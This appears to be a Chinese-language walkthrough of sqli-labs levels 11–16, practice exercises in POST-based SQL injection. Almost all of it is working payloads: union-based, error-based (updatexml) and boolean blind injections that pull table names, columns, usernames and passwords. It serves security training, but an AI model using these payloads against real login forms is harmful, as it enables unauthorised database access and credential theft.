sqli-labs靶场通关详细讲解（附php源码分析Less-11-16）

Less-11

发现该题为post注入，测试注入点发现为',开始写注入语句，使用burpsuite抓包分析

在数字1处进行sql注入

1' --+

1' order by 2 --+

1' union select 11,22 --+

1' union select 11,database()--+

uname=1' union select 11,group_concat(table_name) from information_schema.tables where table_schema='security'--+&passwd=1&submit=Submit

uname=1' union select 11,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+&passwd=1&submit=Submit

uname=1' union select 11,group_concat(username,password) from users--+&passwd=1&submit=Submit

PHP源码分析

分析发现，该处为使用post接收两个值，将它拼接为sql语句

Less-12

简单测试，发现闭合为 ") uname=1")--+&passwd=1&submit=Submit

uname=1") union select 11,database()--+&passwd=1&submit=Submit

发现成功，其余步骤跟Less-11一致

Less-13

uname=1') --+&passwd=1&submit=Submit 测试发现此处为')

uname=1') order by 2--+&passwd=1&submit=Submit 测试发现页面无回显

使用报错注入

uname=1') union select 11,updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&passwd=1&submit=Submit

uname=1') union select 11,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1) ,0x7e),1)--+&passwd=1&submit=Submit

uname=1') union select 11,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 1,1) ,0x7e),1)--+&passwd=1&submit=Submit

uname=1') union select 11,updatexml(1,concat(0x7e,(select username from users limit 1,1) ,0x7e),1)--+&passwd=1&submit=Submit

uname=1') union select 11,updatexml(1,concat(0x7e,(select password from users limit 0,1) ,0x7e),1)--+&passwd=1&submit=Submit

Less-14

测试发现此处闭合条件为 " 且为无回显

uname=1" union select 11,updatexml(1,concat(0x7e,(select database()),0x7e),1)--+&passwd=1&submit=Submit

uname=1" union select 11,updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1)--+&passwd=1&submit=Submit

uname=1" union select 11,updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' and table_schema='security' limit 0,1),0x7e),1)--+&passwd=1&submit=Submit

uname=1" union select 11,updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1)--+&passwd=1&submit=Submit

此题目与上题一致，仅为闭合条件不同

Less-15（补充知识看之前文章Less-8）

测试发现无报错信息也无回显，考虑使用盲注，通过使用Less-8一样的方法，不断测试

uname=1' or '1'='1'--+&passwd=1&submit=Submit 测试出闭合条件

uname=1' or '1'='1' order by 2--+&passwd=1&submit=Submit 测试为2列

uname=1' or '1'='1' union select 11,22--+&passwd=1&submit=Submit 接下来开始猜解

uname=1' or '1'='1' and (length(database()))=8--+&passwd=1&submit=Submit 只有8时为正确页面，说明数据库为8位

uname=1' or '1'='1' and (ascii(substr(database(),1,1)))=115--+&passwd=1&submit=Submit 说明数据库名字第一个字母为s

同理可得uname=1' or '1'='1' AND ASCII(SUBSTR((SELECT table_name FROM information_schema.tables WHERE table_schema='security' LIMIT 0,1), 1, 1)) = 101--+&passwd=1&submit=Submit 猜解表名和列名即可

Less-16

uname=1") or 1=1--+&passwd=1&submit=Submit 此处的闭合条件为")其余步骤与Less-15一致，均使用盲注的方法解决